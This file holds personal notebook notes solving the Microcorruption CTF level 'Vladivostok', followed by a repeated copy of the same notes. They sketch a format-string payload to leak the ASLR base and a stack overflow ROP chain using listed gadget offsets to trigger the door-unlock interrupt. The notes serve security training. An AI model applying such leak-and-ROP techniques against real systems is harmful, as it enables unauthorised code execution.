MicroCorruption/15-Vladivostok/notes.md

`Taken verbatim from my notebook`
# Page 1
```
Vladivostok     ASLR bypass?
    username[8]: 0x242b
    password[ ]
    aslr_base = r11

    aslr_address = normal - 0x4000 + aslr_base

    Have to call 0x10 directly?
        INT 7f:
            Takes no arguments      (THE LESSON WAS)
            7f passed in SR          (ROP CHAINING)
        All calls to INT wrapped in  (+ASLR BYPASS)
            push/pop SR?
            Neat?

    41414141[r10][r11][ret]
    FUCKING PRINTF?

    Things I have:
        printf(username, ...)
        buffer overflow on stack

    Things I need
        Address on stack?

    Flow: 1. enter "username"
          2. "username" printed
                            <- Create payload
          3. enter "password"
          4. buffer overflow
```

# Page 2
```
The Hack    (Vladivostok)

    Uname payload: "%x%x%x%x"
        output %printf
    Pword payload: "AAAA(r10)(r11)(pc)[args...]"

    Useful locations:
        +2aa:   pop sr
        +2ac:   add 8, sp
        +2ae:   __check_password

        +56c:   mov.b @sp,   r15;
                sxt   r15       ; pop.b r15
                incd  sp        ;
                ret             ;

        +4f4:   swpb  r15       ;
                mov   r15,   sr ;
                bis   #8000, sr ; INT
                call  0x10      ;
                ...             ;
                ret             ;

    [popb]7f7f[INT]
notes.md: Add book notes for Montevideo through Lagos 2023-03-16 01:13:34 +00:00			`Taken verbatim from my notebook`
			`# Page 1`
			```
			`Vladivostok ASLR bypass?`
			`username[8]: 0x242b`
			`password[ ]`
			`aslr_base = r11`

			`aslr_address = normal - 0x4000 + aslr_base`

			`Have to call 0x10 directly?`
			`INT 7f:`
			`Takes no arguments (THE LESSON WAS)`
			`7f passed in SR (ROP CHAINING)`
			`All calls to INT wrapped in (+ASLR BYPASS)`
			`push/pop SR?`
			`Neat?`

			`41414141[r10][r11][ret]`
			`FUCKING PRINTF?`

			`Things I have:`
			`printf(username, ...)`
			`buffer overflow on stack`

			`Things I need`
			`Address on stack?`

			`Flow: 1. enter "username"`
			`2. "username" printed`
			`<- Create payload`
			`3. enter "password"`
			`4. buffer overflow`
			```

			`# Page 2`
			```
			`The Hack (Vladivostok)`

			`Uname payload: "%x%x%x%x"`
			`output %printf`
			`Pword payload: "AAAA(r10)(r11)(pc)[args...]"`

			`Useful locations:`
			`+2aa: pop sr`
			`+2ac: add 8, sp`
			`+2ae: __check_password`

			`+56c: mov.b @sp, r15;`
			`sxt r15 ; pop.b r15`
			`incd sp ;`
			`ret ;`

			`+4f4: swpb r15 ;`
			`mov r15, sr ;`
			`bis #8000, sr ; INT`
			`call 0x10 ;`
			`... ;`
			`ret ;`

			`[popb]7f7f[INT]`